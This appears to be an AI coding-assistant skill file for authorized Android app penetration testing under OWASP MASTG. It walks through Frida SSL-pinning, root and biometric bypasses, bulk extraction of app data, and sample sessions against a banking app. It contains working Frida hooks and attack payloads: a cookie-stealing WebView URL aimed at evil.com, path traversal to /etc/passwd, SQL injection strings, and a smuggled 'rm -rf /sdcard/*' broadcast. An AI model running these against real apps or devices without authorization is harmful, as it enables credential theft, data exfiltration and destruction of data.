Android Mobile Application Penetration Testing
This skill enables comprehensive security testing of Android applications through ADB shell access to a rooted Android device and the Android Dynamic MCP server. It covers the full OWASP MASTG methodology from reconnaissance to exploitation and reporting.
When to Use This Skill
This skill should be invoked when:
- Starting a new Android application security assessment
- Performing dynamic analysis on Android apps
- Bypassing security controls (SSL pinning, root detection, anti-tampering)
- Extracting and analyzing application data
- Testing authentication and authorization mechanisms
- Analyzing network communications
- Fuzzing application components (activities, services, content providers, broadcast receivers)
- Performing OWASP MASTG compliance testing
- Writing penetration test reports
Trigger Phrases
- "pentest this Android app"
- "security test the APK"
- "bypass SSL pinning on [app]"
- "extract data from [app]"
- "test Android authentication"
- "fuzz Android intents"
- "MASTG testing for [app]"
- "mobile app security assessment"
Prerequisites
Required Tools
| Tool | Purpose | Installation |
|---|---|---|
| ADB | Device communication | apt install adb or Android SDK |
| Frida | Dynamic instrumentation | pip install frida-tools |
| Objection | Mobile exploration | pip install objection |
| apktool | APK decompilation | apt install apktool |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |
MCP Server Setup
The Android Dynamic MCP server provides comprehensive tooling. Ensure it's configured:
// ~/.claude/mcp.json
{
"mcpServers": {
"android-pentest": {
"command": "python",
"args": ["/path/to/android-dynamic/server.py"]
}
}
}
Mobile MCP for Device Interaction
For advanced device, emulator, and simulator interactions, use Mobile MCP:
- Repository: https://github.com/mobile-next/mobile-mcp
- Purpose: Provides MCP-based interaction with Android emulators and physical devices
- Features: Screen capture, touch automation, app lifecycle management, and UI inspection
// Add to ~/.claude/mcp.json
{
"mcpServers": {
"mobile-mcp": {
"command": "npx",
"args": ["-y", "@anthropic/mobile-mcp", "--android"]
}
}
}
This complements Frida/Objection for scenarios requiring direct device UI interaction.
Device Setup
Physical Device
# 1. Enable Developer Options (tap Build Number 7 times)
# 2. Enable USB Debugging
# 3. Root device (Magisk recommended)
# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"
Emulator
# Use Android Studio emulator with Google APIs (not Play Store)
# Root with rootAVD or system image without Google Play
# Match Frida server architecture (x86_64 for most emulators)
Verification
# Verify ADB connection
adb devices
# Verify root access
adb shell su -c "id"
# Verify Frida connection
frida-ps -U
# Test MCP server
# In Claude Code: get_app_info("com.android.settings")
Quick Start Guide
1. Initial Setup (2 minutes)
User: I need to pentest the app com.example.targetapp
Claude: I'll set up the testing environment.
[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
→ Version, permissions, SDK levels, signatures
2. pull_apk("com.example.targetapp")
→ Extract APK for static analysis
3. list_exported_components("com.example.targetapp")
→ Map attack surface (activities, services, providers, receivers)
2. Bypass Security Controls (1 minute)
[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
→ PID: 12345
2. frida_bypass_ssl(12345)
→ SSL pinning disabled
3. frida_bypass_root(12345)
→ Root detection bypassed
4. setup_proxy("device-id", "192.168.1.100", 8080)
→ Traffic interception ready
3. Dynamic Analysis
[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")
4. Data Extraction
[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")
Methodology Reference
| Document | Coverage |
|---|---|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |
Common Workflows with MCP Tool Sequences
Workflow 1: Complete Application Assessment
# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")
# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)
# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")
# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")
# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
"data", ["../../../etc/passwd", "' OR '1'='1"])
# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()
Workflow 2: SSL Pinning Bypass
# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
# Method 2: Custom script for specific library
frida_run_script(pid, """
Java.perform(function() {
var CustomPinner = Java.use('com.target.app.security.Pinner');
CustomPinner.verify.implementation = function() {
console.log('[+] Bypassed custom pinner');
return true;
};
});
""")
# Method 3: If app uses flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
onEnter: function(args) {
args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
}
});
""")
Workflow 3: Authentication Testing
# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")
# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")
# Credential monitoring
frida_run_script(pid, "credential_hooks.js")
# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")
Workflow 4: Deep Link / Intent Testing
# Map attack surface
components = list_exported_components("com.target.app")
# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
data_uri="targetapp://transfer?amount=1000&to=attacker")
# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})
# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
"../../../data/data/com.other.app/databases/secrets.db",
"file:///data/local/tmp/evil.html",
"content://com.target.app.provider/../../../etc/passwd"
])
# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")
# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
extras={"command": "; rm -rf /sdcard/*"})
Workflow 5: Cryptography Analysis
# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")
# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
var Cipher = Java.use('javax.crypto.Cipher');
Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
console.log('[CRYPTO] Algorithm: ' + algo);
if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
return this.getInstance(algo);
};
});
""")
# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")
# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
Workflow 6: Data Exfiltration Analysis
# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")
# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs
# Monitor data writes in real-time
frida_run_script(pid, """
Java.perform(function() {
var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
SharedPrefs.putString.implementation = function(key, value) {
console.log('[PREFS] ' + key + ' = ' + value);
return this.putString(key, value);
};
});
""")
MCP Tool Reference
Device Interaction
| Tool | Description | Example |
|---|---|---|
get_screen_state() | Current screen/UI elements | Finding clickable elements |
tap_element(x, y) | Tap at coordinates | Automating login flow |
input_text(text) | Type into focused field | Entering credentials |
press_key(keycode) | Press key | BACK=4, HOME=3, ENTER=66 |
swipe(x1, y1, x2, y2) | Swipe gesture | Scrolling, pattern unlock |
long_press(x, y) | Long press | Context menus |
Frida Instrumentation
| Tool | Description | Example |
|---|---|---|
frida_spawn(package) | Start with Frida | Initial attachment |
frida_attach(package) | Attach to running | Already running app |
frida_run_script(pid, script) | Run Frida script | Custom hooks |
frida_bypass_ssl(pid) | Bypass SSL pinning | Enable interception |
frida_bypass_root(pid) | Bypass root detection | Evade security |
frida_hook_method(pid, class, method) | Hook method | Trace calls |
frida_trace_crypto(pid) | Trace crypto | Key extraction |
frida_dump_credentials(pid) | Dump credentials | Credential theft |
frida_enumerate_classes(pid, pattern) | List classes | Class discovery |
frida_memory_search(pid, pattern) | Search memory | Find secrets |
Network Tools
| Tool | Description | Example |
|---|---|---|
setup_proxy(device, host, port) | Configure proxy | Burp interception |
clear_proxy(device) | Remove proxy | Cleanup |
install_ca_cert(device, path) | Install CA cert | Trust Burp CA |
capture_traffic_start(package) | Start capture | Record traffic |
capture_traffic_stop() | Stop capture | Save PCAP |
Data Extraction
| Tool | Description | Example |
|---|---|---|
dump_databases(package) | Extract SQLite DBs | User data, creds |
dump_shared_prefs(package) | Get preferences | Tokens, settings |
dump_internal_storage(package) | Internal files | Config, certs |
dump_external_storage(package) | SD card files | Exports, cache |
get_logcat(package) | Filtered logs | Debug info leak |
Component Testing
| Tool | Description | Example |
|---|---|---|
list_exported_components(package) | Map attack surface | Find entry points |
launch_activity(pkg, activity, extras) | Start activity | Deep link test |
send_broadcast(action, extras) | Send broadcast | Broadcast injection |
start_service(pkg, service, extras) | Start service | Service abuse |
query_content_provider(uri) | Query provider | Data leakage |
fuzz_intent_extra(pkg, comp, key, payloads) | Fuzz intents | Find vulns |
App Management
| Tool | Description | Example |
|---|---|---|
install_apk(path) | Install APK | Deploy test build |
uninstall_app(package) | Remove app | Cleanup |
clear_app_data(package) | Clear data | Fresh state |
get_app_info(package) | App metadata | Permissions, SDK |
list_installed_apps() | All packages | Discovery |
pull_apk(package) | Extract APK | Static analysis |
Frida Script Library
Pre-built scripts in /scripts/ directory:
| Script | Purpose |
|---|---|
ssl_pinning_bypass.js | Universal SSL/TLS pinning bypass |
root_bypass.js | Root detection bypass |
crypto_hooks.js | Cryptographic operation monitoring |
credential_hooks.js | Credential capture |
network_hooks.js | Network traffic monitoring |
biometric_bypass.js | Biometric authentication bypass |
anti_tampering_bypass.js | Anti-tampering/debugger bypass |
intent_monitor.js | Intent/IPC monitoring |
webview_hooks.js | WebView security monitoring |
dynamic_dex_hooks.js | Dynamic code loading detection |
keystore_hooks.js | Android Keystore monitoring |
method_tracer.js | Generic method tracing |
Troubleshooting Guide
Frida Issues
"Failed to spawn: unable to find application"
# Solution: Verify package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>
"Failed to attach: process not found"
# Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app") # Instead of frida_attach
"Script terminated with error"
# Solution: Class/method not found
frida_enumerate_classes(pid, "*TargetClass*") # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.
Frida server crashes
# Solution: Version mismatch
frida --version # Check client version
# Download matching server from https://github.com/frida/frida/releases
SSL Pinning Issues
Universal bypass doesn't work
# Solution: Custom pinning implementation
1. Decompile APK with jadx
2. Search: "certificate", "pin", "ssl", "trust"
3. Identify custom class and method
4. Write targeted Frida hook
# Check for: OkHttp CertificatePinner, custom TrustManager,
# native SSL verification, Network Security Config
App still fails after bypass
# Solution: Multiple pinning layers
1. Check for native SSL verification (libssl.so)
2. Use anti_tampering_bypass.js for Frida detection bypass
3. Try objection: android sslpinning disable
4. Consider frida-gadget for persistent injection
Root Detection Issues
App detects root and exits
# Solution: Multiple detection vectors
1. Use comprehensive root_bypass.js
2. Enable Magisk Hide / Zygisk DenyList
3. Check for native root checks (hook fopen, access)
4. Consider frida-gadget embedded in APK
App detects Frida
# Solution: Frida detection in place
1. Use anti_tampering_bypass.js first
2. Rename frida-server binary
3. Use frida-gadget instead
4. Hook pthread_create to hide Frida threads
ADB Issues
"device unauthorized"
adb kill-server
adb start-server
# Accept prompt on device
"Permission denied" for data
adb root # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..." # With root
Data Extraction Issues
Database is encrypted (SQLCipher)
# Hook to capture password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")
# Or search memory for key
frida_memory_search(pid, "x]@1#%hJ") # Common patterns
Checklists Reference
| Checklist | Purpose |
|---|---|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |
Templates Reference
| Template | Purpose |
|---|---|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |
Example Claude Code Interactions
Example 1: Starting New Assessment
User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.
Claude: I'll set up the testing environment for com.megabank.mobile.
[Executes MCP tools]
1. Getting app information:
> get_app_info("com.megabank.mobile")
Version: 3.2.1, Target SDK: 33, Min SDK: 26
Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...
2. Extracting APK:
> pull_apk("com.megabank.mobile")
Saved to: /tmp/com.megabank.mobile.apk
3. Mapping attack surface:
> list_exported_components("com.megabank.mobile")
Exported Activities:
- com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
- com.megabank.mobile.ShareReceiveActivity
Content Providers:
- com.megabank.mobile.provider.DocumentProvider (exported)
Broadcast Receivers:
- com.megabank.mobile.PushReceiver
4. Starting with Frida and bypassing protections:
> frida_spawn("com.megabank.mobile")
PID: 12345
> frida_bypass_ssl(12345)
[+] SSL pinning bypass active - hooked 8 methods
> frida_bypass_root(12345)
[+] Root detection bypass active
5. Configuring traffic interception:
> setup_proxy("emulator-5554", "192.168.1.100", 8080)
[+] Proxy configured
Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection
Would you like me to proceed with dynamic analysis or test specific components?
Example 2: Data Storage Investigation
User: Check what sensitive data this app stores locally
Claude: I'll perform comprehensive data storage analysis.
[Executes MCP tools]
1. SharedPreferences analysis:
> dump_shared_prefs("com.megabank.mobile")
[!] FINDING in auth_prefs.xml:
- auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
- refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
- pin_hash: "5e884898da28047d9166..."
Severity: HIGH - Authentication tokens stored in plaintext
MASTG: MASTG-TEST-0001 (Insecure Data Storage)
2. Database analysis:
> dump_databases("com.megabank.mobile")
Found: app_data.db (356 KB)
[!] FINDING:
- Table 'accounts': account_number, balance, last_transaction
- Table 'transactions': 847 records with transaction history
- Table 'cached_credentials': username, password_hash
Severity: HIGH - Financial data in unencrypted database
MASTG: MASTG-TEST-0001
3. Internal storage:
> dump_internal_storage("com.megabank.mobile")
[!] FINDING: /files/user_profile.json
Contains: full_name, email, phone, ssn_last_4
Severity: MEDIUM - PII in plaintext file
4. External storage:
> dump_external_storage("com.megabank.mobile")
[!] FINDING: /Android/data/com.megabank.mobile/files/exports/
- statements_2024.pdf (world-readable)
Severity: MEDIUM - Sensitive docs on external storage
MASTG: MASTG-TEST-0003
Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |
Example 3: Authentication Bypass
User: Test the authentication for vulnerabilities
Claude: I'll test authentication mechanisms comprehensively.
[Executes MCP tools]
1. Hooking authentication flow:
> frida_run_script(12345, "credential_hooks.js")
[HOOK] SharedPreferences write: auth_token = eyJ...
[HOOK] HTTP Header: Authorization: Bearer eyJ...
2. Biometric testing:
> frida_run_script(12345, "biometric_bypass.js")
[HOOK] BiometricPrompt.authenticate() called
[BYPASS] Simulating successful authentication
[!] FINDING: Biometric bypass successful
- App accepts fake biometric success callback
- No server-side verification
Severity: HIGH - Authentication bypass
MASTG: MASTG-TEST-0015
3. Session analysis:
> frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")
[HOOK] validateSession(): Only checks local JWT expiry
[HOOK] refreshSession(): No server round-trip
[!] FINDING: Client-side session validation
- JWT expiry can be modified locally
- Sessions never verified server-side
Severity: HIGH - Broken session management
MASTG: MASTG-TEST-0016
4. Token analysis:
> frida_run_script(12345, """
Java.perform(function() {
var JWT = Java.use('com.auth0.jwt.JWT');
JWT.decode.implementation = function(token) {
console.log('[JWT] ' + token);
return this.decode(token);
};
});
""")
[!] FINDING: JWT uses HS256 (weak algorithm)
[!] FINDING: JWT contains: account_id, role, permissions
Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |
Related Resources
- OWASP MASTG - Mobile Application Security Testing Guide
- OWASP MASVS - Mobile Application Security Verification Standard
- Frida Documentation - Dynamic instrumentation toolkit
- Android Security Bulletin - Monthly security updates
Bundled Resources
scripts/
ssl_pinning_bypass.js- Universal SSL pinning bypassroot_bypass.js- Root detection bypasscrypto_hooks.js- Crypto operation monitoringkeystore_hooks.js- Android Keystore hooksmethod_tracer.js- Generic method tracingextract_apk.py- APK extraction toolcontent_provider_scanner.py- Content provider enumerationintent_fuzzer.py- Intent fuzzing automation
references/
owasp_mobile_top10.md- OWASP Mobile Top 10android_security_checklist.md- Testing checklistfrida_snippets.md- Common Frida code snippets